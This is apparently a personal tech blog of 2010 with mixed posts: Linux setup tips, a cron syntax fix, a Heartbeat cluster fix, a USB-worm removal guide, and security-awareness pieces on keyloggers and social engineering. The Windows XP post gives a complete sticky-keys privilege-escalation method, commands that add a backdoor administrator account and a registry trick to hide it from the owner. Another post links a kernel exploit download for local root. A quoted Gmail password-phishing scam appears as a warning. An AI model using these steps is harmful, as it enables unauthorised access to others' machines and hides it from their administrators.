TechnoShit

Mount an ntfs drive with read only permissions in Linux

2010-12-14T14:57:00.002+05:30

Say I have booted a Linux using Live cd or something, and I cant modify any windows file since the windows ntfs file system is in a read only mode. So this is how we can remount it in a read write mode:

Commands:

umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount

Reference:
http://backtrack.offensive-security.com/index.php?title=Howto:NTFS

else find the google cache if the page is unavailable :(

http://webcache.googleusercontent.com/search?q=cache:hzWgy5XSMucJ:backtrack.offensive-security.com/index.php%3Ftitle%3DHowto:NTFS+http://backtrack.offensive-security.com/index.php%3Ftitle%3DHowto:NTFS&cd=1&hl=en&ct=clnk&gl=in&client=firefox-a

Commands to set network settings in Ubuntu

2010-12-14T14:54:00.002+05:30

ifconfig eth0 192.168.1.24 netmask 255.255.255.0

route add default gw 192.168.1.1

echo nameserver 192.168.1.10 > /etc/resolv.conf

ifconfig eth0 up

Manual Removal of sguza.exe and shey.exe worms

2010-06-08T21:05:00.016+05:30

New malwares in town. Not much info available on Google.
shell\open\command=muza\\\sguza.exe
shell\open\command=carpet\\\shey.exe

Again my AV failed to recognize a malware, but when I saw autoruns and hidden folders named muza and carpet in my pen drive, I got suspicious. These files and folders are system files, so if you cant see them, then you need to go to Tools->Folder options->View and set the following settings:

enable Show hidden files and folders
Hide protected operating system files.

Malwares often attribute themselves as system and hidden to stay invisible.
Unfortunately Autoruns and Autoplay were enabled by default on my new system. And it popped the option of "action=Open folder to view files using Windows Explorer". Which could be misleading
as I found the same action in autorun.inf as well. After inspecting the autorun.inf, I believe even if you right click and explore/open its copy gets executed. It has variants in the name of shey.exe and sguza.exe and moves through removable drives. Once its executed you cannot remove the autorun.inf or the hidden folders. I took the help of utility Handle (http://technet.microsoft.com/en-us/sysinternals/bb896655.aspx) by Sysinternals to find out which app has opened the Autorun.inf.
Execute Handle.exe using command prompt and output the results to a text file. And search using CTRL-F for autorun.inf.

explorer.exe pid: 540 administrator
6E4: Section \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ECE.B.NMKKAD
6F0: Section \BaseNamedObjects\MSCTF.Shared.SFM.ECE
6F8: File (RWD) C:\Documents and Settings\lada\My Documents\Downloads
700: File (---) E:\autorun.inf

And as always it was explorer.exe:
which means the malware is using explorer.exe as a host.
I killed and restarted explorer using task manager.

Alternatively we can use Process Explorer (a tool by sysinternals, which is kindof an advanced Task manager) to inspect the explorer.exe and search for SHEY.EXE or other handles and then close them.
Start process explorer and do a CTRL-F search for any handle with the names: SHEY.EXE, SGUZA,EXE, mrpky.exe 194.EXE, 21782259.EXE OR KITA375[1].EXE, OR autorun.inf:

Search for the file names.
If found, close those handles.

After you kill the malware instance, using Proc Explorer OR by restarting explorer.exe, you will be able to delete the muzo and carpet and autorun.inf files.

I deleted the autoruns and the hidden folders named muza and carpet.
The next step was to clean the registry. So you search for all occurrences of shey.exe and sguza.exe and delete them. The malware may use some other names as well, which I found here:

http://www.prevx.com/filenames/X285138109880396664-X1/SHEY.EXE.html

I found the malware still running inside the explorer with the name : MRPKY.EXE
This file is located in C:\Documents and Settings\your_username\Application Data

Again searching the registry I found an entry in the WinLogon startups: (You may use Autorun and ProcessExplorer tools from Sysinternals for this)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman with a value of C:\Documents and Settings\username\Application Data\mrpky.exe

So I deleted this registry entry and deleted the mrpky.exe as well. I searched for other names but as of now couldnt find any.

I restarted my system, and I am not seeing any weird behavior as of now. If I insert a pen drive, it doesnt show any autorun.inf. Nor I am seeing any suspicious exe or dll in explorer. (using process explorer)

Thats all for now.

Summary:
1. If you cannot delete the hidden folder muza or carpet, then kill the explorer.exe using task manager and restart explorer.exe. This will kill the malware instance.
2. Now delete the hidden folders muza or carpet and then delete then autorun.inf as well from your removable drives.
3. Open registry and search for all keys containing sguza.exe or shey.exe and all other probable names here : http://www.prevx.com/filenames/X285138109880396664-X1/SHEY.EXE.html and delete them.
4. Disable autorun and autoplay.(use links section)
5. If at all, the malware still works then it suggests we missed a copy of it. So when you restart your computer, it will be executed again. But all the instances use explorer.exe as a host, so if you want to kill them, restart explorer. But any undeleted registry entry will restart the malware when you restart windows. That doesnt sound good, but we can wait for the AVs to create a tool or reverse engineer it for more details.

Prevention tips:
Disable autoruns and autoplay for all removable drives. http://support.microsoft.com/kb/967715

Update:
For more details about the malware, you can upload the exe on virustotal.com which provides the AV detection results from various Anti Viruses.

Here are the results from the unpacked mrpky.exe:
http://www.virustotal.com/analisis/c887b8c000b422f41a06dc36e0d2a9bf84f114520da0e08cb83dc07005446260-1276933820

Links:
Handle by SysInternals: http://technet.microsoft.com/en-us/sysinternals/bb896655.aspx
Turn off autoplay: http://support.microsoft.com/kb/967715
VirusTotal: http://www.virustotal.com/

Getting root/administrator on a Windows XP

2010-04-25T09:36:00.000+05:30

Getting root/administrator on a Windows XP
*********************************************************************

Well this is my old school trick, the Sticky keys hack. I kindof discovered (though I wasnt the first person to do it, but it was pretty less known hack a few years back) it years back, and I am surprised to see that it still works. This is not a one-click kiddie stuff, though its simple and easy.
In the end, I will also show you how to stay STEALTHY and cover your tracks.(to some extent)

Let me explain you the case precisely:
You have a guest account or any other NON-ADMINISTRATOR account.
And you want admin privileges. Naturally I assume, your admin doesnot want to share the admin password with you.

There is ATLEAST ONE CONDITION for this hack to work (apart from this, I aint aware of any):
Your non-admin account must have write permissions for the system32 directory. That is you should be able to write/modify any simple file in the system32 directory.
Dont worry, we are not going to mess with the ugly SAM and SYSTEM files.
Now I would like to explain some basic mechanics, if you are not interested you may skip it. But if you understand it, I believe you should be able to find many such hacks.

Basic mechanics:
***************************
When a user logs in, and a process is executed, it runs generally with the privileges on the current user. So if you are the user named "Guest" and you run a firefox exe,
in the task manager, under the process list you can see the username as "Guest" for the firefox exe. Now if no user is logged on, and a process is executed, then what will happen?
Our best guess is that it would run with system privilege. So if you can find a file that runs/can be made to run before a user logs in, then it should do our dirty job.
Sometimes it happens that certain softwares like to run their files before a user logs on. If somehow we could replace such files with our shell or any bat file, our dirty job
could be done again :). But its not that easy. The shell is not necessarily executed as expected. Nevertheless, its a possibility. If you like to experiment you can try to find any such files. I ll let you know later,
how to get a sample list of such files.

The Sticky keys Hack
**********************************
There is something called Sticky keys in Windows XP. If you press SHIFT key >=5 times, a window should pop up,

if it doesnt, you can enable its shortcut through Control panel->Accessbility Options-> KeyBoard Tab, in the Sticky Keys group, click on Settings, under Keyboard shortcuts,
check the setting for "Use shortcut". Good news is that you can enable it from a Guest account as well:

Now if you press SHIFT >=5 times, the file responsible for firing this window is under system32 with the name sethc.exe

You got it, take the backup of this sethc.exe and rename it to say sethc_original.exe. Now copy cmd.exe from system32 to somewhere and rename it as sethc.exe.
Copy the new sethc.exe (which is in fact cmd.exe, our shell) in system32, and press yes, when it asks for the confirmation to overwrite.

You can test by pressing SHIFT >=5 times, and you will see a command window being opened. Its not of much use since the privilege of this shell is the Guest or the
no-admin only.
(We cannot use the following commands from the Guest account,unless we have the admin/system privilege, if you try to do that, you will see an error of type:)

To escalate the privilege, restart you windows, but do not login to any account. And when you are at the logon screen,
press the SHIFT key>=5 times and boom, there you got you shell with SYSTEM privileges.

Now you can add a new administrator account "hacked" with a password "hax0rpassw0rd" using the commands:

net user hacked "hax0rpassw0rd" /add
net localgroup administrators hacked /add

And now you can logon to your new admin account now.
You can also reset the administrator password, using the shell, but I wont recommend that for obvious reasons. Our job should be to stay as stealthy as possible.
Just install your software and clear your tracks. Wwith this SYSTEM privilege shell you can also see the files that execute before a user logs in.
Use the command tasklist for that and save the output in some file, for later viewing.

How to stay stealthy.
****************************
Your new account can be easily seen in the Control Panel-> User accounts and in the My Computer in the form of documents as well. This isnt a good sign.

But we can hide our account to a certain extent.

Beware of the Registry, Dont mess around!
Open the registry by regedit, and navigate to the Folder:
HKEY_LOGON_MACHINE->Software->Microsoft->Windows NT->Current Version->WinLogon->SpecialAccounts->UserList

Create a new DWORD value here, set the name as your newly added username, "hacked" in our example, and let the value be zero.

This will stop the display of your user account in Control Panel->User accounts and in the My Computer documents.
However for the expert eyes, your user directories can still be seen in "Documents and Settings" and through the command net user.
So you may need to do some additional tasks, like removing your backdoor account entirely before leaving.

Crontab error "/bin/sh: root: command not found"

2010-04-06T12:58:00.000+05:30

Crontab error "/bin/sh: root: command not found"
********************************************************

Today I struggled with making the crontab work on my system. I am using cron jobs for the first time.
Although I always wanted to understand how it works, esp as I heard that they are good for periodic backups.
But it was quite frustrating for me to make it work, especially if you prefer to google without reading the man pages
thorougly. Let me just explain what I was trying to achieve and how the error got resolved. Now I realize I
could have saved a lot of time, had I read the man pages :(

But sometimes we are in a hurry and we are not at all interested in understanding how things work, but in
making it work as quickly as possible.

For those who want a quick look at resolution of this error I would say,
check your cron syntax:

1. If you are making changes in a local cron file using crontab -e, the job entry should contain 6 fields (not the username)
like this:

* * * * * /home/build_auto/echo.sh

A wrong entry like this:
* * * * * root /home/build_auto/echo.sh

would cause cron to interpret "root" as a command.

THe syntax "* * * * * root /home/build_auto/echo.sh" is valid for system crontab file /etc/crontab.

Most of the syntax related examples can be found by reading the man page for crontab files:

man 5 crontab

Creating a simple cron job to run a shell script
***************************************************
I am simply trying to create a cron job and which would execute a shell script for me at regular intervals.
So first I read through a simple tutorial from where I learn about the basic syntax and the fields.

Now for my simple cron job, I create a simple shell script which will output some data in another text file.
And for simplicity I would like to run it every minute. (so that I can quickly confirm how it works)

So here is my simple shell script which will append a string ("test") to another text file (test.txt)
echo.sh

#!/bin/sh

echo "test" >> /home/build_auto/test.txt

This way everytime the script echo.sh is executed, it will append a string "test" in a new line in test.txt.
So when our cron job executes perfectly i.e. every minute, we see "test" in every new line.

Say I save my echo.sh in a location : /home/build_auto/

Now you can add a cron job at two places:

1. In the system cron file /etc/crontab
2. And in a new crontab file using the crontab command.

This file is will be stored in /var/spool/cron with the same name as the username.

Editing the System cron file /etc/crontab

This way is not advisable as you would be directly interfering with the system cron file which is required by cron daemon.
Still if you would like to add an entry, open /etc/crontab in an editor and add an entry like this:

* * * * * root /home/build_auto/echo.sh

THere are seven fields seperated by spaces. For details on the fields read the man page.
The first field is for minute, second for hour, third for day of month, month, day of week, user account which will be used for execution and command name which is the full path of our shell script.

The *s indicate the job will be executed every minute, every hour and so on. Save the /etc/crontab and your job should execute every minute. There
is no need to do any service restart.

Editing the user level crontab file using the crontab command

The other way is to create a new crontab file using the option -e (edit) with crontab, which is mostly meant for non-root users.
This file will have the same name as the username and can be found at the location: /var/spool/cron

The crontab syntax is similar to the previous one, except that instead of 7 fields, there are only 6. The username is not required.

Create a new crontab file using the command:

crontab -u root -e

or simply

crontab -e

and add an entry like this:

* * * * * /home/build_auto/echo.sh

Remember, no username here, the crontab command has already taken care of it through the -u option. (or through the current user if -u is omitted)
Save the file and now your cron script should be executed every minute.
Confirm your entry by listing down the crontab list for user root:

99EP68903:/home/build_auto # crontab -u root -l
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.XXXXosSNdV installed on Mon Apr 5 22:03:11 2010)
# (Cron version V5.0 -- $Id: crontab.c,v 1.12 2004/01/23 18:56:42 vixie Exp $)
* * * * * /home/build_auto/echo.sh

You can also see the same in the file /var/spool/cron/tabs/root.

Making mistakes

In case, as a noob you create an entry "* * * * * root /home/build_auto/echo.sh" using the crontab -e command, you will get mail error messages like this one:

From root@linux.local Mon Apr 5 22:01:01 2010
Return-Path:
X-Original-To: root
Delivered-To: root@linux.local
Received: by linux.local (Postfix, from userid 0)
id CC5ED320408; Mon, 5 Apr 2010 22:01:01 +0530 (IST)
From: root@linux.local
To: root@linux.local
Subject: Cron root /home/build_auto/echo.sh
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env:<PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20100405163101.cc5ed320408@linux.local>
Date: Mon, 5 Apr 2010 22:01:01 +0530 (IST)
Status: R

/bin/sh: root: command not found

This can be misleading, and it can be easily misunderstood as if the cron is unable to locate /bin/sh. But in fact cron is trying to execute a command with the name "root", which does not exist.

This is because cron expects a command in the sixth field.

After a few minutes, upon successful executions of the cronjob the test.txt should look like:

99EP68903:/home/build_auto # cat test.txt
test
test
test
test
test
test
test

And one more thing, ensure that in your shell script the PATH of all files resolves to absolute path, any relative path like ./test.txt would
resolve through the home directory of the user that is executing the cron job.

#end of post

Getting root on Ubuntu Intrepid Ibex

2010-04-01T22:07:00.000+05:30

So this turns out to be the lamest posts of all time. When I am high I just run a list of kernel exploits to gain a local root on my Ubuntu. A bit of uname here:

uname -a Linux r00t3r 2.6.27-7-generic #1 SMP Fri Oct 24 06:42:44 UTC 2008 i686 GNU/Linux

Download the exploit:

http://inj3ct0r.com/sploits/836.rar

Result is in the screensh0t:

As far as I remember it didnt work on kernel 2.6.31, Ubuntu 9.1.
#end of p0st

Automotive Expo Bangalore 2010

2010-03-21T12:28:00.000+05:30

I visited the event, it was quite an experience and I am posting some of the pics here. Along with the event, there was a freestyle bike stunt performance as well.

Chevrolet Camaro (Transformer fame):

Suzuki Intruder M1800R:

Suzuki Hayabusa, GSX 1300 R:

CBR 1000R:

Kawasaki Ninja 250:
Ducati Monster 1100:

And some wheelies:

Most common ways of losing your password: Keyloggers (Beginner level)

2010-02-26T10:09:00.000+05:30

hacked_by_a_keylogger. This may not be a complete or an expert guide, but rather a beginner level guide for introduction to keyloggers based on my own experience. Sorry for poor formatting, and weird color choice, I pretty much suck at this. :(

Keyloggers

Its a software which captures the keystrokes you type on your keyboard. They come in different flavors, with a good number of features. They can capture the sites you visited, take screenshots, and the applications you opened. They save these keystrokes in a file and may periodically send/email them to the bad guy. Although there are hardware keyloggers as well, which can be physically plugged into the computer, but those are less common since they come for a price. For this post, the keylogger refers to a software based keylogger only. So whatever details you entered as username/password or any website that you looked for will be sent to the bad guy.
(I rather prefer to use the term bad guy, instead of arguing the difference between the terms hacker and cracker)

Most common places where keyloggers can be found are computers with public access, especially cyber cafes and computer labs in a college. Be careful while visiting Cyber cafes and public computers, these are the most vulnerable places where a bad guy can easily install a keylogger.
The keylogger captures all the keystrokes that are being typed through the keyboard, and saves them in a file, including the details like the sites you visited, the applications you opened, even screenshots, and so on. And so after you leave the bad guy can simply read that file,
login to your account, and change the password. And its hard to find a keylogger installed, since they are good at being stealthy and almost impossible to find for a novice computer user. The bad guys in these scenarios are mostly young kids or someone who wants to exploit his new found 'keylogger' knowledge just out of curiosity. They just set up a trap and wait for any victim to fall in it. Or you might be the victim of your tech savy boyfriend who enticed you
into using his 'new' laptop for checking your account. Thats a bit of social engineering. :)

AntiViruses dont provide 100% security from keyloggers. An antivirus works on the basis of known signatures, and so if the new keylogger signature is unknown, the antivirus wont report it. But a good updated antivirus gives you a good amount of protection against previously known and latest threats. Thats why its advisabe to keep your antiviruses updated.

How they get installed.

Technically a keylogger is only a piece of code that logs keystrokes, they could be a part or only a feature of a Trojan horse or a malware. Now there are can be numerous ways a malware can intrude your computer and I would list the most common ways:

Someone, may install it manually on your computer or on a public computer.
Your browser may be vulnerable to a web based attack, and by visiting a bad site, the bad site may cause your computer to download and install malware/trojan/keylogger.
Removable media/Pen drive worms.
Virus infected software install.
Worms that use Network vulnerabilities to move around.
Keylogger binded with a genuine program. (yeah, you can say a trojan horse)
There are softwares commonly known as binders, which can attach a keylogger to a genuine program. For eg. your friend could use a binder to bind the keylogger executable to a game executable, and then he would ask you to try this new 'exciting' game. When the user executes the game exe, it runs the keylogger as well, and even though you find the game exciting, it did much more harm to your computer by covertly installing a malware.
Therefore its important that you download executables from trusted sources on the internet. And you pay attention to the software that is being installed on your computer.
Something that I may not be aware of! :/

Technical Solutions for keylogger safety:

Finding whether a keylogger is installed or not on a computer is not an easy task and quite technical. Some common hints to look for: Most of the trojans, viruses, worms and keyloggers and any other malicious software are most likely to do
one thing:

Start the malicious program, when the computer starts.

So you can go ahead searching for places like start folders, Windows Registry (run) and so on. I think you can google about this for improving your windows knowledge. Even a worst case would be when the malicious program isnt exacly a program but a library like a dll, and instead of starting the malicious program at computer start, it will insert itself in an already existing genuine program like Explorer.exe which loads at startup.

I remember a case when I was hunting for a malicious dll on my personal computer. It was running, but I could not find it in the process list. Ultimately I used a tool called ProcessExplorer
(http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx)
which can search for loaded dlls and windows handles in executables. And I found the malicious dll loaded inside Explorer.exe! In such a case, the dll wont be listed in the Run key of windows registry, but as an library argument to a genuine executable like explorer.exe.

Care must be taken while editing your windows registry and while looking for suspicious files. Any mess could result in your windows getting crashed. The best way is to google the file/key name and find out the details. Look out for tricks like SVCHOST.EXE and SVCH0ST.EXE, the first one is a genuine windows process and acts as a host file to various services, whereas the latter one has a zero instead of 'O' and is certainly trying to disguise itself.

But as I said, in worst cases, there is no guarenteed way of finding it and requires an expert eye.

Some suggesstions:

Do not login to your accounts from a shared computer and that does not belong to you. (Even your best friend's computer)
Make sure you login from a computer, such as your personal one, or your office one, that no one else uses.
Do not login to your accounts using a public computer like in a cyber cafe or in a college lab.
Keep your personal computer physically safe, so that no one installs anything without your permission.
You can use an on screen keyboard for entering your password, since it never uses keystrokes, but mouse clicks. This feature can be seen onmost of the banking sites today, where for logging in your internet account, you are required to use an onscreen keyboard. Sometimes optionally and sometimes its mandatory.
I found an interesting reference on the wiki page for keyloggers, that you may like to read. (How To Login From an Internet Cafe Without Worrying About Keyloggers) http://cups.cs.cmu.edu/soups/2006/posters/herley-poster_abstract.pdf
There are some more useful links on the wiki page as well. http://en.wikipedia.org/wiki/Keystroke_logging

Even better suggesstions:

Learn and start using a linux. If you are a beginner, I would suggest an Ubuntu. (Not that I have tried other flavors, but because I find Ubuntu to be quite friendly, and its excellent support forum has solutions for most of the problems. Most likely you will not be the first one to have that problem. :)) Its easy to use and install and hardly within a month you will find yourself in a comfortable position. Linux is no more an OS used only by tech Gurus. :). Dont worry if you think you suck at Linux, we all do suck at something. Every expert was once a beginner.

Chances will be very rare that you will be a victim of a keylogger attack.

The attacks are very easy to be performed on windows. (Windows is popular as well, and there are thousands of keyloggers available for windows. Also writing a basic keylogger isnt a very hard stuff.)
A novice computer user is likely to use windows.
Since majority of the users worldwide use windows, the bad guys make bad tools targetting windows, so Linux users are not so favorite victims.
Keyloggers exist for linux, but in most cases installing them isnt an easy task (i.e. without root)
Given the above points, in my opinion, a Linux user is very less likely to get hacked through a keylogger.

Best Suggesstion:
Stop using internet, and switch to Postal service. :)

Happy Learning!

How to save myself from simple password hacks and phishing Part1: Social Engg.

2010-02-12T11:15:00.000+05:30

No. I didnt lose my password. Its just the title of this writing. I am going to talk about the ways you can lose your passwords and sensitive info. Recently one of my dear ones lost her password and that prompted me to write a guide of dos and donts when you are sitting on the computer. The most common problem is that: someone changed your password, and now you cant access your account. And you want to know how? The problem is not that you just lost a free email account, but the most important contacts, documents, personal mails etc that you gathered over the time are suddenly gone. And you ask yourself, what the hell would someone gain by adding this overhead in my already shitty busy life. I had so many important details saved there.

I am planning to write down some of the most common methods by which you can lose your password. I cant summarize everything in one post and I will start with the most basic, kindof stupid but effective ones. The plan is to write them in different posts with increasing order of technical complexity, and as the complexity increases, the chances of them being used against you reduce. I would name some of those:

1. Social Engg.

2. Phishing

3. Fake login pages

4. Keyloggers

5. Trojan Horses

6. Browser Exploitation/Vulnerable pdf readers, documents ACtivex Controls

7. Cookie stealing and session hijacking

8. Sniffers and the importance of SSL(means https v/s http)

9. Man in the Middle attacks etc

In this post I ll only talk about the simplest of all. Social engg. And I wont blame you if you say: Thats not hacking! Thats not even related to computers?? But yes, it works for many.

Some Intro

****************

Its a common problem that some of us face some time, mostly while we are in college. And yes, when we are in college, most of us are curious about the email passwords of the most pretty faces. So many times I have heard this most stupid and dumb question, Can you hack gmail and yahoo passwords? Man, get a life. There are some more important things in life than just accessing and changing some poor chaps password. First the question is ill-poised. Dont expect that giants like Google and Yahoo (backed by finest of brains) are so lame in their security, that they expose the accounts of their users just like that. So we can rule out the possibility that someone can actually retrieve a password from their servers. Oh yeah thats a sign of relief. And that also means that if someone says that by sending an email containing blah-blah text and blah-blah code the server will 'accidentally' return you the password, thats a total rubbish. I will tell you about this case in a while.

I got Hacked! My password got changed.

1. Social Engineering.

*****************************

Social Engineering is something very non-technical. When you choose your password or security details that can be guessed by someone very easily, you may get into trouble any time.

Consider this scenario:
If a bad guy wants to access your account and all he knows is your emal id, then he/she would try to gather information about you, parents' names, your crush, your spouse and all sorts details that can make a common password. Your name appended by 123 and so on. There could be several other details like the answers to your security question, if the bad guy correctly finds it (its not very hard to find your pet's name or your birthplace) and which in fact is the correct answer, then you are in trouble. The bad guy may talk to you and may coerce you into giving these kind of details, and you might be unaware of it. The best thing is to keep your sensitive information totally unrelated to your public life. Security answers and passwords should be hard to guess, especially for security questions, like your pet's name, you need not always give the name of your pet, but something unique that only you could think of. In todays world of social networking there are plenty of things a stranger can know about you merely by looking at your profile. By the way, even if your password is strong and your security question cant be guessed by anyone, there are still ways in which someone could trick you totally into giving away your password. Amazed? Lets see a few examples:

Yet again a very common example, this is text I copied from a random internet search about the method, Go on read the text, and dont get fooled.

Need to hack Gmail passwords?
It is possible and it is easy. This way of hacking into Gmail. accounts was brought to my attention by a friend of mine who is a bit of a computer wizard. I have tried the method a least a dozen times and it has worked on all but 2 occasions, I don't know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address. This is how it is done:

STEP 1- Log in to your own Gmail account. Note: Your account must be at least 30 days old for this to work.

STEP 2- Once you have logged into your own account, compose/write an e-mail to: adminstaff.google@gmail.com
is a mailing address to the Gmail Staff. The automated server will send you the password that you have 'forgotten', after receiving the information you send them.

STEP 3- In the subject line type exactly: " PASSWORD RECOVERY "

STEP 4- On the first line of your mail write the email address of the person you are hacking.

STEP 5- On the second line type in the e-mail address you are using.

STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a JavaScript from your account in the Gmail Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status. The process will be done automatically by the user administration server.

STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa script<> v703&login=passmachine&f=(password)&f=27586&javasc ript=ACTIVE&rsa#> {simply copy and paste above.}

so for example if your Gmail id is : davidabc@gmail.com and your password is: David and the email address you want to hack is: then compose the mail as below:

To: adminstaff.google@gmail.com
bcc:
cc:
(Don't write anything in cc,bcc field)

Subject: " PASSWORD RECOVERY "

victim@gmail.com
davidabc@gmail.com
David

cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa script<> v703&login=passmachine&f=(password)&f=27586&javasc ript=ACTIVE&rsa#>

{simply copy and paste above.}

The password will be sent to your inbox in a mail called "System Reg Message" from "System with in 6 hors. When my friend showed me how to do this I thought it was too good a trick to keep to myself! Just try and enjoy!

Tempting? yeah I bet you be tempted to try this, if you happen to read it for the first time. If you dont know much about computer working, but you are smart, you will try this with a fake account. If you are quite learned about computers, you will laugh at it. But if you are new to computers and a bit dumb as well, then you are actually sending your password to someone who created the fake email id staffadmin.google@gmail.com. In all those technical looking so called "hifi code" we generally miss the fact that Step6 asks us to enter our own password, and yet the text convinces us that it will be used by the email to "log in". After a bit of confusion, you are probably convinced and send the email, And boom, you just yourself gave your password away. What a hack! or How Dumb? The guy just tricked me into giving my own password, and I realize that after a day when I cant log into my account. Well there is no technique involved here, the bad guy just exploited some of the basic human traits: greed, willingness to trust when you see gains, stupidity? (yeah I believe, most of us are not perfect and we act stupid out of greed, fear, extreme emotions) And thats what social engineering is all about.

There are few more examples, oh yeah about a 1000 more.. social engg. is a very tricky thing.

Some more common real life examples:

An online fraud.

This one happened with a friend of mine, but unlike this story my friend did the smart thing.

=> Someone calls me on the phone and says He/she is calling from my bank and there are heavy purchases being made from my credit card. If I am not the one who is making those purchases, he/she immediately needs to block the card.

For confirmation, she asks me to verify my personal info.
My name:
My phone number:
My D.O.B:
My address:

and say last 4 digits of my account number, or even more to make it sound genuine. (This info isnt very hard to obtain, yeah even the last digits of account number could be from your half torn ATM receipt) Then she asks me for my credit card number. And then after some more discussion, she asks me my security code, just for verification that she is talking to the right person. She tells me that she knows it already, but its necessary to verify that I know it, so that she could actually go ahead to disable my "stolen" card. And if I cant verify I ll have to go to the Bank office personally, and write an application and blah blah. Till that time all my hard earned money would have been stolen and then even the bank cant do anything about it. After listening to this, I am now afraid, and I finally give her my security code to "disable" my card. Now I am convinced that I did the right thing, and I managed to save my card from misuse. After 2 days or so, I learn that my card was indeed used for making heavy online purchases but after the bank call. Duh, I gave all my card details to a stranger with a sweet voice.

Why would I do that, out of fear, and out of carelessness.
Almost every bank and other service providers have this provision of telling their customers that NOBODY from the bank would ever ask you for any login/security information either by mail or phone or otherwise. So never respond to them or even inform the bank immediately.

These are some of the most basic social engg. examples. There are some more of those online frauds (sort of phishing ). The wikipedia has an excellent article on phishing (http://en.wikipedia.org/wiki/Phishing)

Oh Honey! I won a lottery

What if I go ahead and foolishly try to claim that one:

Or an unclaimed Gift Card???

Or a distress call from a mysterious rich woman, who suddenly found you interesting, and who seeks your help to move her money overseas.

Fake officials?

Sometimes the good ol gmail warns you as well.

These are only some of the examples that I could found. And these are the most basic forms of social engineering. In my next posts we ll talk about some technical types of social engg, we ll talk about malicious hyperlinks, fake login pages, malicious email attachments, and how to not to fall for them. So till them, have a good time.

HeartBeat Linux problem

2010-02-08T11:51:00.000+05:30

Related to Heartbeat package for High Availability Clusters (SLES 11)
The apache resource script was failing, for this reason the whole cluster wasnt working fine. I searched so much, but couldnt find the reason..

node242:/etc/ha.d/resource.d # ./apache status

2009/05/08_02:41:04 ERROR: command failed: sh -c wget -O- -q -L --bind-address=127.0.0.1 http://localhost:80/server-status | tr '\012' ' ' | grep -Ei "[[:space:]]*" >/dev/null
2009/05/08_02:41:04 ERROR: Generic error
ERROR: Generic error

Then I set up the debug flag set -x in the shell script, and I got the location of the actual file where the command was failing. Its in:

/usr/lib/ocf/resource.d/heartbeat
Here in the apache script, I saw the following code, which was in fact preparing the wget command parameters.

#
# It's difficult to figure out whether the server supports
# the status operation.
# (we start our server with -DSTATUS - just in case :-))
#
# Typically (but not necessarily) the status URL is /server-status
#
# For us to think status will work, we have to have the following things:
#
# - $WGET has to exist and be executable
# - The server-status handler has to be mapped to some URL somewhere
#
# We assume that:
#
# - the "main" web server at $PORT will also support it if we can find it
# somewhere in the file
# - it will be supported at the same URL as the one we find in the file
#
# If this doesn't work for you, then set the statusurl attribute.
#
if
[ "X$STATUSURL" = "X" ]
then
if
have_binary $WGET
then
StatusURL=`FindLocationForHandler $1 server-status | tail -1`
if
[ "x$Listen" != "x" ]
then
echo $Listen | grep ':' >/dev/null || # Listen can be only port spec
Listen="localhost:$Listen"
STATUSURL="http://${Listen}$StatusURL"
case $WGET in
*wget*) WGETOPTS="$WGETOPTS --bind-address=127.0.0.1";;
esac
else
STATUSURL="${LOCALHOST}:${PORT}$StatusURL"
fi
fi
fi
test "$PidFile"
}

From the comments I figured out that server status check wasnt required in my case, its best to comment that out for my case, the problem seems to be that the wget command itself isnt getting executed by the shell.

monitor_apache() {
if
! have_binary $WGET
then
ocf_log err "Monitoring not supported by $OCF_RESOURCE_INSTANCE"
ocf_log info "Please make sure that wget is available"
return $OCF_ERR_CONFIGURED

elif [ -z "$STATUSURL" ]; then
ocf_log err "Monitoring not supported by $CONFIGFILE"
ocf_log info "Please set the statusurl parameter"
return $OCF_ERR_CONFIGURED
fi

if
silent_status
then
#ocf_run sh -c "$WGET $WGETOPTS $STATUSURL | tr '\012' ' ' | grep -Ei \"$TESTREGEX\" >/dev/null"
else
ocf_log info "$CMD not running"
return $OCF_NOT_RUNNING
fi
}

So I commented the line:
#ocf_run sh -c "$WGET $WGETOPTS $STATUSURL | tr '\012' ' ' | grep -Ei \"$TESTREGEX\" >/dev/null"

and my problem was fixed.

node242:/etc/ha.d/resource.d # ./apache status
Script name is : /usr/lib/ocf/resource.d//heartbeat/apache
2009/05/08_02:46:29 INFO: Running OK
INFO: Running OK

Installing a Module in Perl through source

2010-02-08T11:50:00.000+05:30

I am very new to perl. No idea how to make things work in perl. I mean resolving errors and that kind of stuff. I can write programs with some google help. Two days back I wanted to generate a malformed UDP packet, a packet with an Invalid UDP length field. This kind of packet was notorious for causing a DOS attack on older Unix systems (dont know whats the current status). Sure it was fun. But yes, I found a useful tip for a perl beginner like me. It happens when your code requires a perl module that is not available in your current perl installation. In such cases you see errors like:

Can't locate Socket6.pm in @INC (@INC contains: /usr/lib/perl5/5.10.0/s390x-linux-thread-multi /usr/lib/perl5/5.10.0 /usr/lib/perl5/site_perl/5.10.0/s390x-linux-thread-multi /us
r/lib/perl5/site_perl/5.10.0 /usr/lib/perl5/vendor_perl/5.10.0/s390x-linux-thread-multi /usr/lib/perl5/vendor_perl/5.10.0 /usr/lib/perl5/vendor_perl .) at /etc/ha.d/resource.d/l
directord line 721.
BEGIN failed--compilation aborted at /etc/ha.d/resource.d/ldirectord line 721.

Obviously it means that my Linux doesnt have the perl module named Socket6.pm. It happends many times that if I google with this error string, I may or may not find a quick solution. The better way is to go to the CPAN search site

http://search.cpan.org/

and search for Socket6.pm

This will give you the package that has Socket6.pm in it. Again there can be two ways of installing it, either you install it through CPAN or install it by source. I preferred the second method as my linux machine had some internet connectivity issues.

So download the tar.gz package from the results returned by search.cpan, extract it and install it using the commands

tar -xvzf package.tar.gz
perl Makefile.pl
make
make test
make install

tcpdump

2010-02-08T11:49:00.000+05:30

